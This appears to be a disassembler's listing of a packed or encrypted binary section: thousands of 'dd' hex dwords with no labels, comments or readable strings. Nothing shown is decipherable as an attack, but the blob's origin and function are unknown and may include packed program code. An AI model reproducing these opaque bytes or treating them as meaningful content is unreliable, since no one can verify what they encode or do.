dd 5DD9754Bh, 0CA68BE5Bh, 0B6440490h, 0C601845Ch, 0C139B70Fh
dd 0AFD80BE8h, 7AFEC7h, 73F83B08h, 442893Fh, 2CF0666Ch
dd 0A3BF70F0h, 9E868Ch, 305FFC1h, 398966F8h, 3D308B65h
dd 4D19574Fh, 9618740Ah, 0E5418139h, 1EA0B7E0h, 80710A36h
dd 393FEB92h, 0F837F02Bh, 9ADBBF20h, 0DD068D6Fh, 5EEC181h
dd 80BEC62Bh, 2A6ABC42h, 80985801h, 5051ECCDh, 0C7DA9953h
dd 0B0DB851Ch, 1A7E58F9h, 5D89560Fh, 855E1FCh, 98C3348Dh
dd 31E83E0Ch, 302FF45h, 0FC4DD4C6h, 5EEB7518h, 0CB8B46h
dd 0E2D35F5Ah, 0C9C22B5Bh, 46E104E4h, 8978773Ah, 0FF33F807h
dd 3D5C7D39h, 0F05A7DD9h, 207E19FCh, 40127856h, 0E81E0C42h
dd 6F7F066Fh, 144FCFh, 4509E0D3h, 3B4730FCh, 5EE27C4Eh
dd 5F148B62h, 5342B05Bh, 7599A156h, 7EEA040h, 906576D0h
dd 0F989811Fh, 0A5FCA094h, 8C8D0903h, 38D0238h, 0FEC5E8C0h
dd 83D8830Fh, 0F03BA0CBh, 51812B75h, 288AD1FBh, 6C323D7Dh
dd 6BC2FCC8h, 0A301468Dh, 0DC303D5h, 97E847DEh, 0BDBE85Dh
dd 0D1EBD80Ah, 3B032ABEh, 6D117DDEh, 0EC38244Bh, 718B7BE8h
dd 8A5F0A35h, 997E5EC3h, 0C8FADA56h, 6360E8F1h, 75C08531h
dd 1A44FA16h, 94570C24h, 5A031780h, 30774C8Dh, 31E3E830h
dd 7D8B3BEBh, 24E3ED7h, 19243F2Ah, 4B1B7557h, 4D42B610h
dd 8C8C4148h, 37BCE8C7h, 8C00583h, 56A11EBh, 42048E8Ah
dd 0A9E85AB3h, 841013A4h, 0BEE3675Dh, 0AD534041h, 4589C850h
dd 5D73D87Ch, 93307A3h, 0D04620E8h, 4C03D475h, 553B17F0h
dd 0FF65800Eh, 1B9BB903h, 6EB87638h, 0FB8B4462h, 0ABF34A80h
dd 0F633045Fh, 83C04D8Dh, 620EC4Fh, 58DC66F0h, 0E00C06F8h
dd 0B4FD4BE8h, 24D8F639h, 1C43B976h, 83CEC0F8h, 558D03E0h
dd 0E1C1C00Eh, 0A4C8EC04h, 4BE4A1F4h, 41A00021h, 490F73A8h
dd 2551FB81h, 6B81BC44h, 40C98D04h, 60834F24h, 188C12FEh
dd 2EC10E6Ch, 7DF44D89h, 0EBBA19F3h, 0E50A260Dh, 3EED405h
dd 0A3ECBF5h, 0E070FB06h, 56227428h, 2BE85501h, 10048AC7h
dd 8788B39Fh, 3F75FFD0h, 46CE57EAh, 1ED43E65h, 3424260Fh
dd 748B60B3h, 43C06886h, 0E8CC0677h, 0B64E923h, 71883D10h
dd 4DE46C7Ch, 8A33E88Ch, 6366584Dh, 8073E845h, 45C72F0Dh
dd 2C410DE0h, 5917FCF8h, 0BF85EE83h, 221F1D42h, 0E0E83298h
dd 52828531h, 0CE413F75h, 0D110040Fh, 0E84382CFh, 7518A2C8h
dd 7AB866Bh, 0FF81EE8h, 2448CF9Dh, 0B893A5Fh, 0E988CF2Bh
dd 1A7B2665h, 0B107D088h, 3CB74AF8h, 0E9021BFCh, 0A5219741h
dd 0C68E10B0h, 144E0575h, 6A27EBECh, 7645C888h, 0EBF01870h
dd 8FA8DA09h, 0F3DC5B8Eh, 0C55EC12h, 98FEDB67h, 2FF47528h
dd 0A6568F2h, 0DB55DA5Dh, 45694C5Ah, 0FD7E1281h, 55E9F82Ch
dd 85B6BFA6h, 0DC6D3C59h, 0ADF20CC7h, 27067524h, 664207Ch
dd 20A35ADBh, 0E8340A60h, 0F80C9192h, 4C7C9704h, 58243E03h
dd 0D4519DD9h, 726E706h, 60188445h, 0FC774503h, 4D7C2141h
dd 8341C88Bh, 0E7ECF9D1h, 1D497F01h, 0F0D302CFh, 1A7D0E28h
dd 8B52ADC2h, 2B46C0D1h, 4B5EC2C8h, 8224055Eh, 0EB260156h
dd 0E7518D21h, 5D35997Fh, 35231EFBh, 0E945EBF8h, 9B356A50h
dd 8011A621h, 9680D8EBh, 0FFF8547h, 7EA38984h, 2A02F624h
dd 0E876E9A0h, 87E0C248h, 0A328808h, 0F4D6C142h, 0FB47AF25h
dd 0C443166Eh, 0A83B057Eh, 9ADB72D8h, 0C0CFF103h, 0C09B820Fh
dd 5A5E5B6Bh, 4100C933h, 74E82CACh, 0E8C8FE06h, 0FBEB5102h
dd 0F20FADDCh, 0ABC11C2Bh, 3B04C083h, 87E575CAh, 3048DE58h
dd 0C3h, 0B0000000h, 25230000h, 0A0770041h, 10000000h
dd 47120040h, 0
dd 0FFFD6F00h, 0B4547DFFh, 871721A3h, 16821FAh, 0E3C651CEh
dd 19C13D60h, 3FD1AA6Ch, 22CC4C59h, 0F1FD665Eh, 25DA94C3h
dd 526C0047h, 4A924CAh, 118AC2h, 6421CED7h, 0F9892B5Ah
dd 427FFC68h, 53EA7736h, 29A76D1Ah, 0EF1F9BB0h, 95C440A8h
dd 8C5141BCh, 321121B1h, 0BFD67659h, 4918A186h, 4D97645Ch
dd 0A56E1485h, 0D9163E9Fh, 5C00EC94h, 0D3C3CA66h, 0B7711C76h
dd 0AC4004A1h, 0F57DEF18h, 6266A862h, 582C1E4h, 9F99735h
dd 0EF14EACDh, 0EB7B54BDh, 1B5BC526h, 96F46F0Ah, 0A8088531h
dd 427D939Ch, 42957E8Bh, 0D4EFAB9Eh, 0C75828DAh, 0B3B5B3B4h
dd 0A1A54725h, 863AC4ACh, 7FDBA1B9h, 0D5F0DE9Ah, 0F7BA623Ch
dd 55F9E433h, 0C9D3C649h, 1D1B8205h, 4DD0D386h, 5E9F5B22h
dd 0CEA32069h, 0E84E6A74h, 7767FA07h, 68D14907h, 1A9D428Dh
dd 8A57207Fh, 1387F01Ch, 8D47FF2h, 0BB1E8F6Bh, 0A06BB451h
dd 70EF274Fh, 0A833C198h, 2AD659FDh, 0FE24417Dh, 0C73D9792h
dd 0F6D89929h, 744BFA68h, 1BF122FFh, 796DF1C9h, 63640BB8h
dd 7C4FF3D0h, 937A49FCh, 1B691899h, 5E4B022Bh, 0BAD1DF52h
dd 0F7F04AC8h, 0CAFA9FECh, 2B834AFBh, 0F826369Fh, 0B49BF129h
dd 4B1FC96Eh, 7DC7B259h, 5F06D77Eh, 9F2C1C81h, 0AA57304Eh
dd 2E308AF2h, 76B9F29Ch, 0EAFEEA55h, 0DAFE036Ah, 25B29F65h
dd 8F34FEABh, 56E6F107h, 0F3567B6Bh, 29AD1B00h, 968C0F2Eh
dd 4CBB94AEh, 27D49319h, 7218651Eh, 78247129h, 0AF897C46h
dd 5AA70F88h, 0C201F873h, 0FD38A1C5h, 0C79D583Dh, 54C58474h
dd 0FD7DD85Fh, 2A91B71Eh, 0FD9F7239h, 26A118DCh, 0E611BFDCh
dd 0B26E72D6h, 25505F3Dh, 1A958B6Ch, 0BAEBD411h, 0CFD4F046h
dd 55387F06h, 0CA7C363Ah, 3B11BC85h, 2A5CEFDDh, 5060B341h
dd 0FA7B71E1h, 9EA9DADFh, 14711CA0h, 59136DCh, 0F8DCED22h
dd 6599E9CCh, 0F2F6001Bh, 0C617B59Dh, 9B9C7C9Bh, 7CF34B85h
dd 46FE6F70h, 402E9872h, 645B9275h, 4C7DCC03h, 22BBB99Dh
dd 0A31AC3F5h, 0B7890104h, 1DFD45FDh, 3A5FC9E7h, 0C29A0914h
dd 0FF9442F0h, 8BA15FDEh, 0BAD029C4h, 0CBC06A04h, 747A12D6h
dd 59F2EF8Dh, 0DBEE0F27h, 0F77F00D9h, 4C0D29A1h, 1F162E52h
dd 272EFB49h, 9E4340B5h, 72AF8FBAh, 0D9171EAAh, 117F5F6Ch
dd 761796D2h, 319D324Ah, 4DC45814h, 310E798Dh, 0B9E40337h
dd 0B7BBC2B8h, 112816FEh, 0CC95CF06h, 27234157h, 98812BEEh
dd 0E0B463C1h, 0B15F0E99h, 2E79D05Fh, 0B5CA5FCEh, 77E80BF2h
dd 0A887FAAh, 3F5245D4h, 304848D4h, 3A153D18h, 0AC355F2h
dd 0B77E128Eh, 69866660h, 0DF1FF844h, 800EAC65h, 0CFEC8F0h
dd 0D29A9CEAh, 0F247F710h, 0B6E49445h, 0BE73F1CFh, 0B8D0BAF8h
dd 0BDF2BBD2h, 28C749EEh, 9EBE99F2h, 0F3634E98h, 410EA98Ah
dd 0BCCB9AD7h, 8C4AB487h, 9DC0CE05h, 4FD9DB93h, 0F86CE465h
dd 2103F62Fh, 523D9B67h, 318D53EEh, 0F3096523h, 9D1D18EDh
dd 59B4F78Eh, 35BDF837h, 0BEE71547h, 0B20E6BE9h, 73CBE7C2h
dd 0AEDEDEA2h, 8A8B2E24h, 51F9A88Dh, 17CA7444h, 0E34F02D7h
dd 0FC94AA1Fh, 0F401BA7Dh, 44CC19A4h, 0F4C4D058h, 0E8EA9EF6h
dd 66F3D25h, 951D8A7Ch, 0DDF2C96Bh, 172C0F2Ch, 16FBEA7Dh
dd 0B71457C6h, 6B22CCEBh, 0CECF289Bh, 3D869228h, 0EB848D65h
dd 877985C8h, 668307A8h, 1359D28Eh, 1FDB1F1h, 6F2FF2A6h
dd 9AC72333h, 334C120Ch, 670EA796h, 5284CF21h, 4A115666h
dd 0BC695417h, 812C6185h, 5B33ABF8h, 0AA8DB04Eh, 2085ADA1h
dd 0ADF79E6Bh, 73D97842h, 93FC02B6h, 8CC5E94Fh, 4D73498Dh
dd 0CA0F4E95h, 0ED14FEC8h, 0E8C3B442h, 8E4C573h, 0EBC94B95h
dd 0E7172CE6h, 82E66646h, 4F797532h, 0CF020AC0h, 1326EB36h
dd 6E45EA58h, 80BF603Bh, 215B50A7h, 0EDB9E5DCh, 7C09CD52h
dd 1748ECC1h, 81FD5CBFh, 77A5A7A2h, 0D88D9249h, 938B998Ch
dd 2E190E2Dh, 0D5AA6E35h, 0D5DDE4C0h, 0F12940EEh, 470CB0E8h
dd 3218A480h, 5EF7800Fh, 0B8E8AFB9h, 0B9EB14EAh, 0B7C3C95Ah
dd 4DA5E4BDh, 2DC4BA79h, 0E871AF5Bh, 0D1D1194Fh, 431B2016h
dd 2CA3810Ah, 0D0CB3FAFh, 0C5D71D1Bh, 0D812CCCAh, 0E7A07D5Bh
dd 0E0B22310h, 0E04B3277h, 5D2C0778h, 15241B5Fh, 0ADE3Ch
dd 6FD72B8Bh, 3D9DFE33h, 15B2165Bh, 95480DE0h, 0C8E08CF4h
dd 40A2F542h, 1227496Eh, 64342690h, 5D4D3625h, 0B7A7FB73h
dd 36C10510h, 9E51E002h, 0CC2F05DDh, 0DC74EF3Eh, 4D848F5Eh
dd 0F221C7AAh, 8AF0DFF3h, 3D79EBB4h, 0AF06F779h, 56B2C112h
dd 0A02C66D7h, 0C6E9C8FEh, 0CCA71AC9h, 5726CAA6h, 21B2531Ah
dd 0A6C8F119h, 0EC7C800Ah, 25D0D18Eh, 2A67BD50h, 0EA1473ADh
dd 0C51FF9AAh, 7980D499h, 6068B127h, 0D6C5F4EBh, 1033EE0Eh
dd 0B0328A57h, 0A99E901Ah, 6383779Ch, 0E08AE69Bh, 7588DEF2h
dd 825CEBD3h, 76D88854h, 631B9971h, 69526E75h, 0EBBCD668h
dd 43A37964h, 0A7B3B327h, 913AFBA2h, 7AFB2F9Ah, 83931ED7h
dd 9C834679h, 9EC8CA29h, 6E3B8524h, 3BBD33B8h, 24EBB93Fh
dd 7F90A31h, 6EED2541h, 8ADC96DFh, 48F1F045h, 51E18117h
dd 1ECB5C82h, 8FBCF3EAh, 7DFC64DFh, 0A4159A6Fh, 0AA13CB3Fh
dd 0DA3A5350h, 5863060Eh, 4E598B72h, 6D961B22h, 4A84588Fh
dd 1569117Dh, 570F2883h, 5187A195h, 52B16F72h, 3EEA17Fh
dd 803951E5h, 9EFD97D6h, 486EFEEFh, 0DDE702F2h, 0E96C2C26h
dd 72C0D908h, 8CA5A2Ah, 7DFA33F5h, 0CBF12EFh, 0BB2035A2h
dd 324A48E1h, 1BE1EADh, 8B0B051Eh, 8CC81103h, 511FC9D1h
dd 2FFC95B0h, 16A3FE90h, 0F128B3CCh, 37A962C1h, 0C87A7F76h
dd 24630417h, 657BE9A4h, 0AE55FF7Fh, 0B7A16EC5h, 0FB11F360h
dd 1E62A73Eh, 0DC5B525h, 0B886F0FAh, 9D210114h, 89BF0291h
dd 29653262h, 0D2977495h, 0FF2EEA92h, 7E012FE0h, 0D057BAF2h
dd 0DD2715DBh, 0F7831C1Eh, 0CC13F0A6h, 0E102BF71h, 0DF8777F6h
dd 0D7849964h, 5A337B01h, 0EC756DABh, 8E3C3054h, 99EC9165h
dd 6D039649h, 0F861DF3Bh, 687E2AAFh, 2A2EEB0Dh, 16C12230h
dd 0FA971875h, 0BA1DD37Dh, 0C606C891h, 646A77E5h, 9C400A40h
dd 83177872h, 0CF8AFD71h, 0DFEA58CDh, 1181F376h, 0B759ADD5h
dd 9D92BBA4h, 415F0197h, 21C424F0h, 93CF8D2Bh, 0BF7F7CE9h
dd 0ECE15B15h, 0D4B982FAh, 836671C0h, 617A21Bh, 0E1CC40E8h
dd 70BBECFh, 0C29320FDh, 0F46D17F6h, 9EE78505h, 0F808914Ah
dd 73439A4Ah, 0EBE164EFh, 4747A4EFh, 0C7073DA0h, 0A9AA7853h
dd 31CE15B9h, 0EC7D78Ah, 29D6AF38h, 0D6C9A9D5h, 5C99145Ch
dd 8BB42EF0h, 7F48EEE9h, 968DF4E6h, 231305D4h, 32701C67h
dd 795D6371h, 817DACF8h, 0EAEEBA50h, 28FA0DF0h, 0AE9F5E4Fh
dd 5E1B779h, 724F4239h, 0B9DB4183h, 10F73564h, 7BC6D744h
dd 0E77CA69h, 0A887AE87h, 2648064Ah, 2FC6BA23h, 13AC5961h
dd 0B05FAB05h, 38DC14D1h, 9EB7B5FFh, 0EB9E196Eh, 72890662h
dd 0DDFF96FEh, 5EBF78EAh, 8F7545E2h, 316489CAh, 1DFF5947h
dd 0F52EE832h, 6C820CA0h, 19D564F6h, 4B0C2232h, 78D0051Ch
dd 58A9C80Dh, 1FF6178Fh, 7A2B02CBh, 5B32E9D3h, 641A6F2Dh
dd 4287D2F5h, 33D7BFC4h, 0E2502F78h, 883FDA29h, 231B229Bh
dd 66921CF9h, 41A925C2h, 9AD7B2F8h, 0E5D7C2BFh, 961E7B63h
dd 0A7BCC600h, 9BEFCEEDh, 0EAAB52AFh, 0E7DE7F87h, 3C4EE229h
dd 0D0DA87CFh, 4B69E05h
dd 71DEF5F2h, 0D6867C4Bh, 18CC12E3h, 0E80297D9h, 5BAEB8B5h
dd 7EB85AE0h, 168C6A54h, 786A6FBCh, 10C0D325h, 83F4CABh
dd 4AC7ADF8h, 5B0D1A1Eh, 1AF1D6C6h, 830D538Dh, 0D3448A84h
dd 0B4771Fh, 0F0ACE818h, 2A1B714Fh, 720B51F0h, 0E8E39720h
dd 0F48A91D7h, 0AA138FD1h, 0C9D1806Ah, 8D09973Dh, 2332D93h
dd 0D2E5AB7Eh, 4C2CA9F2h, 2C90F279h, 0E4C4D0C7h, 1F146ED8h
dd 0E5E0B284h, 95F666B6h, 23244AC4h, 93E46B70h, 152D2763h
dd 2F036493h, 0CE7C1EABh, 0DA6D4E42h, 36091432h, 7025CA2Fh
dd 56A8646Ch, 0C6F2D270h, 0EC48658Ch, 0F5BB9451h, 6D9E2372h
dd 0A40EB339h, 92702CA0h, 0C7B7C1DDh, 2A523EADh, 7D650622h
dd 9987E5B6h, 273EBAA0h, 3405452Bh, 53B19654h, 0C18407Fh
dd 0D71BA97Dh, 0B4A3BFE2h, 0E31634DEh, 803907EDh, 9F16A4A5h
dd 893C98BDh, 0AFF892BEh, 0A73DD3A8h, 71A89571h, 4287E285h
dd 0D5418C27h, 26B33954h, 9774F26Dh, 123BEB7Eh, 2F74445Bh
dd 5FC69EAEh, 0AA6228h, 0B132E88Ch, 0C333D1D7h, 3EF6E551h
dd 660BC949h, 0C178FCA7h, 819C7B56h, 0CAA98862h, 3640D332h
dd 0E80EAFEFh, 78454A1h, 28516D71h, 8EDA9571h, 0E18F1D4Ah
dd 0ED66A62Fh, 0AF8AE480h, 292AD42Eh, 0C844F81Eh, 9EE12BE2h
dd 0A1D0AE4Dh, 8B6630ABh, 0C21C6F33h, 7AAA996Eh, 0D950519Ah
dd 7B7F2C79h, 0DB2B096Bh, 0F95C2F79h, 4580C0E7h, 6C2999F7h
dd 4D763F5Ah, 19FE1967h, 0BB49B77Fh, 7FA5AD98h, 0C067377Ah
dd 0ADAC5B15h, 926DF001h, 50D5CCB0h, 63A6C5AAh, 2BC32111h
dd 0DA23568Ch, 0F8389DCFh, 4686EF9Fh, 5C7980DAh, 0DB8E5567h
dd 6A68B69Eh, 0E431F782h, 8D863193h, 0AF7E386Ch, 0AFE36D65h
dd 22B6CA71h, 58FCA7A5h, 0C13896ECh, 7D277DA8h, 3352786Eh
dd 0C6132C7Eh, 34EE2DFh, 41A97DBBh, 11674889h, 85CEB45Ah
dd 0C7A2E684h, 0F307332h, 3782BDD6h, 0D877B3D1h, 4878E8E6h
dd 6210903Eh, 6C1E1E8Fh, 1CBE23ABh, 0FF67D6E0h, 3CF5EAB2h
dd 2756855Dh, 71ED9B83h, 0F5F361Bh, 6263FDA7h, 858B96F7h
dd 844E19F5h, 0C20BB526h, 837E4F37h, 6FB3177Ch, 45AD743Ch
dd 0FC430530h, 92DA6C8Ah, 2F0F4DD0h, 6190AFBBh, 2CFF0CE9h
dd 39D71F31h, 0D1060E5h, 0CA472AFFh, 75CA856Ah, 0AA383473h
dd 4BA55CFFh, 8F9C0CD3h, 0FCBA6799h, 23610F3Eh, 0ECAC7878h
dd 0B7787F7Fh, 837E03A6h, 0C7B8D1F8h, 52E71C7Ah, 33633E3Eh
dd 0D14D73C3h, 2BA2EEB4h, 8525E5D0h, 0E36EF50h, 3C64C06Bh
dd 416B1AD5h, 0EB580125h, 791BC052h, 0AE943D2Eh, 612DA64Dh
dd 23467B61h, 0E16E74B7h, 34527568h, 0F2C7F39Fh, 17EB2B04h
dd 81DBAE14h, 91BC6F8Dh, 0B22E21C1h, 21726DF0h, 95D207C4h
dd 3A630952h, 5BAB9C00h, 0B8E594ACh, 0EA3E14EEh, 6A3BB7CAh
dd 0BC66794h, 0A87C8C18h, 78B29033h, 91791A4Bh, 2E43AFA1h
dd 1222949Eh, 46197E5Ch, 5038846Dh, 0F4541BE2h, 2A45AC98h
dd 0BA950A2Dh, 0B60A333Dh, 0A00D4652h, 7CA620BEh, 47768C0Fh
dd 0A0B77529h, 64D3C69Ch, 80677E78h, 0DBCB35EAh, 0B15C98B4h
dd 2EF935Ah, 19FAF01Bh, 403CEEB6h, 0F5F3A7D0h, 0BA43AD14h
dd 57D0EC04h, 787BF1A6h, 1D6D349Dh, 0FBAFE3DAh, 0D9811FDDh
dd 0D7EE4D0Dh, 0D3B37A75h, 1BC6093Ah, 23BF4460h, 0F38FB034h
dd 0EDE2684Eh, 280453A9h, 331F4AFEh, 7B4A0B60h, 9884B6BAh
dd 0F6F8C4FFh, 8124890Ah, 611064EBh, 0E4CA15C1h, 27378E6h
dd 0B964FDF7h, 1F0C98C1h, 7548B38Ah, 167BC6D8h, 0E6867F3h
dd 0BEA6F0FAh, 679436DBh, 591DE4B3h, 401A97ACh, 5414AFB2h
dd 0A5B6352Ch, 0F5D38227h, 6864B28Ch, 7A22B307h, 251C4EE5h
dd 77D69486h, 0AC2DF14Ch, 2E84666Fh, 69909E40h, 9FF60149h
dd 69FCD09Ch, 0F094897Ch, 16A3C730h, 8EC97072h, 951EC04Ah
dd 7189297Fh, 22093A8Bh, 42796C0Ah, 408A8F01h, 0BA712765h
dd 24079F55h, 0FFECBB87h, 97FAE168h, 0A98700Ah, 0D9B9022Ah
dd 7D7344Ch, 0B30224DFh, 5C00024Ch, 0B1429BBEh, 0C8FD4DB6h
dd 0ADC8E2ADh, 0A764A89Fh, 0D4B53614h, 3D73C094h, 6DB28A9Ah
dd 54B5B388h, 0E7CFF0D9h, 42E72C68h, 0C697BBEBh, 0EEED801Fh
dd 7FAA3D90h, 3760FA4Fh, 3BDB0BD4h, 7815B9A9h, 79889994h
dd 0D694A54Dh, 0CD35DDADh, 0D4A12733h, 0B42A8DB1h, 3BF35EDDh
dd 55AF9C52h, 85CB5AD5h, 0D32D4BEBh, 0B0C94CEEh, 343BDF51h
dd 0D1AB1E19h, 203DF21Fh, 1B9749F1h, 86A469CEh, 183A8792h
dd 15EDD6D2h, 1C8DE70Ah, 1EB21667h, 0E7EC9F45h, 580B1C47h
dd 7692A63Ah, 2141D6C9h, 0EB5A2F22h, 7878E0BFh, 6B60DD0Ah
dd 0B1E59E85h, 0E81B57F8h, 90A3FA57h, 0FAB52731h, 0AD670CEh
dd 8D333BFBh, 0B19CA3F0h, 26225FCBh, 2FEBBF5h, 0DF8F7400h
dd 0DC4A6968h, 24020470h, 0AC143C3Fh, 8E3E667Fh, 26ECF096h
dd 1E895934h, 6C8A6815h, 292358ACh, 7396DDFFh, 3027C4B7h
dd 44CDCCEEh, 84DF1C1h, 0CD2DBCF0h, 1EA9559h, 35ACF4CFh
dd 0DC878672h, 5E641E06h, 0F3F85AE0h, 1C2D8FCDh, 600241Ah
dd 0F1FC601Fh, 770380EBh, 0A3FA48C9h, 0F9446A0Ah, 25FC9CE8h
dd 178828B7h, 0A56FC818h, 6184D2A8h, 3145313Eh, 38E9DA18h
dd 233F419h, 529C13DEh, 0FA90A74Dh, 6ED80A9Ah, 9275094Fh
dd 8B3F16Dh, 0B7FEC3A7h, 50ACD4F1h, 0F1C90D2Fh, 38EE189Bh
dd 0CC91B945h, 7CF34830h, 45C42C52h, 0D11A465Dh, 84BA1929h
dd 9999C66Bh, 0C0A9DB6Fh, 68E67FC1h, 3B77839h, 72165289h
dd 5A617696h, 938B5BFBh, 0F4A19157h, 4B7B2DDBh, 8D7453C0h
dd 0FAE1B617h, 0FA794A6Ch, 89DC5171h, 0F97831A8h, 0B800CBFAh
dd 8CCB1136h, 8D540484h, 0F8C292F6h, 40AC2C68h, 0B1D99590h
dd 0E15F5F80h, 2376F52Eh, 1D1910D8h, 19B306CCh, 8220ABB3h
dd 114032EBh, 0B69C781Ah, 0E1166810h, 0FD55A998h, 0CA8AFD3Fh
dd 0AFB4109Eh, 29678F88h, 2C6FAF08h, 768E1F26h, 0CBA2F5E1h
dd 72548ECh, 197D7CEDh, 7EA1D173h, 0CB8DA281h, 0CFC013Bh
dd 2DB6A20Fh, 0A99F82B3h, 6ED2271Fh, 83103ABEh, 1C631AF2h
dd 0F58AE72Fh, 0A97E90E1h, 8B2C9E09h, 271D62Dh, 0F778A5D7h
dd 0F472E64Ch, 6D91F951h, 718A42E6h, 12E67783h, 0C9A1B90Eh
dd 6C3D0699h, 0F4273A3Dh, 0E2991BDDh, 0F6804850h, 0B23072F6h
dd 9285ED6Bh, 0C1CF64CEh, 3E3E7A47h, 825F24Ch, 1E1369C1h
dd 1312F348h, 7A082DADh, 23559F85h, 0C8D48024h, 0BF1B3E4h
dd 0E8D91F0Fh, 4303C2BFh, 98A76DDAh, 8906313Fh, 0C72F8363h
dd 0ABA542C9h, 0C8050F49h, 8398128Fh, 3985FC31h, 16873D6Ch
dd 41A7346Fh, 9CF91349h, 474EF6AAh, 86EFE64Dh, 8CA0CC56h
dd 4B410B1Ah, 0A31F4201h, 28D6B365h, 3D581F1Ch, 87A3DC50h
dd 47B321F4h, 60755722h, 0F2584Eh, 0E09EA660h, 0FABB274Ah
dd 9FF1C120h, 0DA38336Ch, 7E1AF541h, 44532529h, 3E67CD3h
dd 83EEE6EDh, 962DC855h, 89D8E4D7h, 0CE1719C7h, 0D5F72E28h
dd 0C2CF93Eh, 5BC90C67h, 80B54127h, 5A3BA305h, 0B12F5C6Bh
dd 0DA7CA856h, 2A44429Eh, 0D977116Eh, 0E03F9DBBh, 8C2A3BE9h
dd 954F543Ch, 0F103870Dh, 36BD297Fh, 3BB18CF2h, 3C8E2D43h
dd 0C130AB25h, 34E9A20h, 7C9644F8h, 0FA6D2259h, 7970CDBDh
dd 4798F15Eh, 5DE09C5Fh, 7F146F55h, 0C0D3AD0Dh, 0E861EB79h
dd 60CC3CD8h, 8FCFFF76h, 837963F4h, 0B237EA9Fh, 55EBB389h
dd 5F2CDF71h, 74719CF6h
dd 36DC21D1h, 2B506DDh, 778215C0h, 0ED42117Fh, 0A4C47CF5h
dd 0A65AD0BAh, 919FCBBEh, 94AD0AA2h, 6F61C56Bh, 9330E2A5h
dd 53F8926Eh, 0D1B1BA1h, 0FF7B86E7h, 15B8267Ch, 7F89A524h
dd 9657FC92h, 0A80BAB14h, 919B2E0Eh, 24A80AB6h, 0C97BDC71h
dd 0F5916FEDh, 13EFC610h, 0D4277F0Bh, 1E3666ECh, 0CF42B977h
dd 77312B23h, 37CF4C3Ch, 88BCEC32h, 74BC95C8h, 94B43577h
dd 8B623F1Fh, 72E1BB6Ch, 0B263C65Ah, 8EF51AA2h, 0EF8E61EDh
dd 0A4BDA343h, 6205609Bh, 0A556FDFBh, 0E80B5492h, 88AE73AEh
dd 669E0692h, 302D8610h, 73C746E8h, 3C8141C4h, 2C57F7D7h
dd 684DF214h, 0F86250CEh, 3E7754BCh, 173EA471h, 0EF9D8E6Ah
dd 0D2C0661Ah, 0AA00DB95h, 0CB461A35h, 0D0B32A55h, 8208496Dh
dd 6F701582h, 8A13EDB9h, 82BA1CE6h, 1B80B6A4h, 0B266B728h
dd 1BBAAEF7h, 410B9F65h, 404CC9A0h, 5421904h, 8DE3F98h
dd 0EC404AF9h, 58D6E58h, 32EE752Ch, 0A37ECEEDh, 0E17CA452h
dd 0C141B0EDh, 5A51BC9Bh, 0A4E696D5h, 995C59B2h, 2F5563B7h
dd 233CD188h, 0E0D223CAh, 495F0E4Ah, 0BA2C409h, 1B9EB5DDh
dd 6B78FDA3h, 0D3DF5982h, 0FB7426CEh, 0BE01E668h, 8A05E054h
dd 5360A6F8h, 9C5F11Dh, 5A522054h, 774FD9A1h, 0A90B79B9h
dd 0C566030Ah, 93FAF8DEh, 0A1B19F8Ah, 0CB02D054h, 0C824D836h
dd 376FAAFDh, 0DD71882Fh, 0FD65779Bh, 6CE27BFAh, 7ED85D13h
dd 87FA6601h, 0BEEB9152h, 0F677116Bh, 97D7D37Ch, 556E6F56h
dd 766AD390h, 307F9547h, 0AD39807Dh, 0DA334C5Fh, 5C75853Bh
dd 0C8A04FC7h, 0B41EA4D3h, 0BE38632Dh, 17BAE32Fh, 0CE65AEECh
dd 0DD8E040Ch, 8127B0CCh, 0CC71E735h, 7103CA81h, 0B5B4A673h
dd 5DFA5501h, 0F7B64258h, 0EB96CE1Ah, 984D7DF0h, 4877BEC2h
dd 5401A7FEh, 45DC1370h, 0E5FD3F95h, 1CB7D370h, 8781E000h
dd 1A9AB4BAh, 3E19DF60h, 2B0A065Bh, 9EE929B5h, 50DC6B0Ch
dd 0E404BC89h, 0B81E8620h, 60290BFAh, 2FE4D084h, 10495C77h
dd 0EC4F52CEh, 94B64A22h, 0C7FBBD5Ah, 8F601423h, 37DB49DAh
dd 0F0750F4Eh, 86C3DDD7h, 0CD3D24BEh, 68134FD1h, 0B5D16065h
dd 8C8526FBh, 904DEB92h, 0C121582Eh, 9345FB40h, 6709C361h
dd 8A180F52h, 80A7F8C6h, 793F2300h, 601A9F20h, 6858272Ah
dd 64FF7A10h, 0FF9B99BDh, 0C1851291h, 761401A8h, 0BA8C74FEh
dd 8DF4E881h, 8AA3D0C7h, 7F8130Ah, 9C6B9253h, 8F41E6C8h
dd 22C19D7h, 0BDE2EB52h, 0D1479C7Ch, 8FE2C01Ah, 8B9CF6D9h
dd 0FC4FD3C8h, 0CBCFDF65h, 0F7015596h, 0F763F91Eh, 68F5F0D9h
dd 5169A2D7h, 0CE5511CEh, 4B3D4D5Dh, 8CD97934h, 5B45907Eh
dd 0A1D745D6h, 0B6375E82h, 0DD7A5FCEh, 0D16D2468h, 207A9E9Ah
dd 922574E0h, 0E6D6DCF0h, 0FF979E58h, 0A916B8CFh, 1373B03Ch
dd 6FB73937h, 0FB5FB9E0h, 1C766D51h, 8F9EB2C9h, 740E2617h
dd 48C10A18h, 49637046h, 51A315B4h, 0F58AFFF3h, 0BA34DBh
dd 0F41AE657h, 0C8F02715h, 8B1052CCh, 0A968C168h, 0F3F7E6BCh
dd 0C0F8C16Ch, 0BB49C318h, 6868FACAh, 20337F88h, 4D2946Ch
dd 0C4E795C0h, 65CB3736h, 0C471A428h, 8E1DCD30h, 0D4287A2Dh
dd 4ACD78E2h, 4C93E169h, 6141D97Ah, 8DB8822Ah, 3D11ADBh
dd 0FBA71738h, 0ECC14A8Fh, 644B1652h, 0F6B1DD63h, 76DCC8FBh
dd 97A558Dh, 686A483Dh, 749ADA14h, 6D1EB3F2h, 0DB891D3Ch
dd 84645F80h, 0A396CD5Eh, 0CE0EE30Ch, 0F6E0561Ah, 4B49F823h
dd 16501217h, 67ABAF76h, 25AB407Fh, 98561E4h, 68800AE1h
dd 9C21C0B5h, 0E6EEFB0Fh, 0EFAC3479h, 273CBA61h, 6169B2BCh
dd 8D4F07CFh, 0FDD83BB0h, 57C357Dh, 595EF2DBh, 0B3A5DA66h
dd 33DE62D9h, 95D2F2Ah, 57B48AEDh, 0C1318E37h, 98B23E33h
dd 43A0625Ch, 8186F242h, 19FE337Ah, 0CB32296Ah, 0CB4C0814h
dd 0D1FCD575h, 22ABC3D5h, 6BBF4C5Ah, 0E16F8D13h, 5C97D042h
